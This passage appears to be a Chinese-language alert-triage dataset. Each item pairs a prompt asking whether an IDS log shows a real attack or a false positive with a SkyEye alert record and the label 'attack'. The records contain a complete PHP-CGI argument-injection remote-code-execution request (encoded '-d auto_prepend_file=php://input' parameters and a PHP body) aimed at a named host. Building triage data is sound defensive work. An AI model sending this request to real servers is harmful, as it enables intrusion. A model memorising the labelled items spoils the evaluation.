y4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "PD9waHAgZWNobyhtZDUoJ2FjdW5ldGl4LXBocC1jZ2ktcmNlJykpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_b37c0bade0585bfeb7577540e6722ca8", "access_time": "2024-11-27 00:08:06", "content-length": "43", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "124.239.114.146", "dimension": "3", "url_path": "/cgi-bin/php.cgi", "src_mac": "00:94:a1:5e:6e:87", "file_name": "php.cgi", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nContent-Length: 43\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "<?php echo(md5('acunetix-php-cgi-rce')); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268438522-PHP CGI查询参数信息泄漏漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "sport": "7999", "h_url": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637286", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732637286, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 42, "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dport": 80, "vuln_name": "PHP代码执行攻击", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 22, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "124.239.114.146", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2018-09-13 16:03:57", "sport": 7999}, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "26bdeba127ea52f040c116037c5823a6", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/cgi-bin/php.cgi", "first_access_time": "2024-11-27 00:08:06", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "9e8e3179c8b9929be153ad67b16e888f", "xff": "", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02010000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732637267", "code_language": "PHP", "public_date": "2018-09-13 16:03:57", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "42", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020593", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)", "vlan_id": "", "vuln_type": "PHP代码执行攻击", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "22", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi9waHAuY2dpPyUyRCU2NCslNjElNkMlNkMlNkYlNzclNUYlNzUlNzIlNkMlNUYlNjklNkUlNjMlNkMlNzUlNjQlNjUlM0QlNkYlNkUrJTJEJTY0KyU3MyU2MSU2NiU2NSU1RiU2RCU2RiU2NCU2NSUzRCU2RiU2NiU2NislMkQlNjQrJTczJTc1JTY4JTZGJTczJTY5JTZFJTJFJTczJTY5JTZEJTc1JTZDJTYxJTc0JTY5JTZGJTZFJTNEJTZGJTZFKyUyRCU2NCslNjQlNjklNzMlNjElNjIlNkMlNjUlNUYlNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlNzMlM0QlMjIlMjIrJTJEJTY0KyU2RiU3MCU2NSU2RSU1RiU2MiU2MSU3MyU2NSU2NCU2OSU3MiUzRCU2RSU2RiU2RSU2NSslMkQlNjQrJTYxJTc1JTc0JTZGJTVGJTcwJTcyJTY1JTcwJTY1JTZFJTY0JTVGJTY2JTY5JTZDJTY1JTNEJTcwJTY4JTcwJTNBJTJGJTJGJTY5JTZFJTcwJTc1JTc0KyUyRCU2NCslNjMlNjclNjklMkUlNjYlNkYlNzIlNjMlNjUlNUYlNzIlNjUlNjQlNjklNzIlNjUlNjMlNzQlM0QlMzArJTJEJTY0KyU2MyU2NyU2OSUyRSU3MiU2NSU2NCU2OSU3MiU2NSU2MyU3NCU1RiU3MyU3NCU2MSU3NCU3NSU3MyU1RiU2NSU2RSU3NiUzRCUzMCslMkQlNkUgSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LCovKjtxPTAuOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwLGRlZmxhdGUsYnINCkNvbnRlbnQtTGVuZ3RoOiA0Mw0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "PD9waHAgZWNobyhtZDUoJ2FjdW5ldGl4LXBocC1jZ2ktcmNlJykpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_8c7b12c4c137f165cba0a1755c001c30", "access_time": "2024-11-27 00:08:06", "content-length": "43", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "124.239.114.146", "dimension": "3", "url_path": "/cgi-bin/php.cgi", "src_mac": "00:94:a1:5e:6e:87", "file_name": "php.cgi", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nContent-Length: 43\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "<?php echo(md5('acunetix-php-cgi-rce')); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567955-PHP代码执行攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "sport": "7999", "h_url": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637286", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732637286, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 0, "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dport": 80, "vuln_name": "PHP代码执行攻击(机器学习)", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 0, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "124.239.114.146", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2020-11-25 19:53:49", "sport": 7999}, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "26bdeba127ea52f040c116037c5823a6", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/cgi-bin/php.cgi", "first_access_time": "2024-11-27 00:08:06", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击(机器学习)", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "c065908a1c1ae6861a6555319836b824", "xff": "", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02020000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732637267", "code_language": "PHP", "public_date": "2020-11-25 19:53:49", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b70", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)", "vlan_id": "", "vuln_type": "PHP代码执行攻击(机器学习)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi9waHAuY2dpPyUyRCU2NCslNjElNkMlNkMlNkYlNzclNUYlNzUlNzIlNkMlNUYlNjklNkUlNjMlNkMlNzUlNjQlNjUlM0QlNkYlNkUrJTJEJTY0KyU3MyU2MSU2NiU2NSU1RiU2RCU2RiU2NCU2NSUzRCU2RiU2NiU2NislMkQlNjQrJTczJTc1JTY4JTZGJTczJTY5JTZFJTJFJTczJTY5JTZEJTc1JTZDJTYxJTc0JTY5JTZGJTZFJTNEJTZGJTZFKyUyRCU2NCslNjQlNjklNzMlNjElNjIlNkMlNjUlNUYlNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlNzMlM0QlMjIlMjIrJTJEJTY0KyU2RiU3MCU2NSU2RSU1RiU2MiU2MSU3MyU2NSU2NCU2OSU3MiUzRCU2RSU2RiU2RSU2NSslMkQlNjQrJTYxJTc1JTc0JTZGJTVGJTcwJTcyJTY1JTcwJTY1JTZFJTY0JTVGJTY2JTY5JTZDJTY1JTNEJTcwJTY4JTcwJTNBJTJGJTJGJTY5JTZFJTcwJTc1JTc0KyUyRCU2NCslNjMlNjclNjklMkUlNjYlNkYlNzIlNjMlNjUlNUYlNzIlNjUlNjQlNjklNzIlNjUlNjMlNzQlM0QlMzArJTJEJTY0KyU2MyU2NyU2OSUyRSU3MiU2NSU2NCU2OSU3MiU2NSU2MyU3NCU1RiU3MyU3NCU2MSU3NCU3NSU3MyU1RiU2NSU2RSU3NiUzRCUzMCslMkQlNkUgSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LCovKjtxPTAuOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwLGRlZmxhdGUsYnINCkNvbnRlbnQtTGVuZ3RoOiA0Mw0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "PD9waHAgZWNobyhtZDUoJ2FjdW5ldGl4LXBocC1jZ2ktcmNlJykpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_e70f0841084615d4d7b2d42ed021885a", "access_time": "2024-11-27 00:08:06", "content-length": "43", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "124.239.114.146", "dimension": "3", "url_path": "/cgi-bin/php.cgi", "src_mac": "00:94:a1:5e:6e:87", "file_name": "php.cgi", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nContent-Length: 43\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "<?php echo(md5('acunetix-php-cgi-rce')); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569456-PHP代码执行攻击(机器学习)", "rule_labels": "{}", "sport": "7999", "h_url": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637286", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件上传", "_origin": {"write_date": 1732637286, "vuln_harm": "攻击者通过文件上传获取一个webshell后,使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 5, "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dport": 80, "vuln_name": "发现脚本文件上传行为", "rsp_status": 0, "code_language": "通用", "solution": "1、文件上传的目录设置为不可执行权限\r\n2、判断文件类型,后缀名,内容等\r\n3、使用随机数改写文件名和文件路径", "hit_start": 0, "detail_info": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "xff": "", "sip": "124.239.114.146", "vuln_desc": 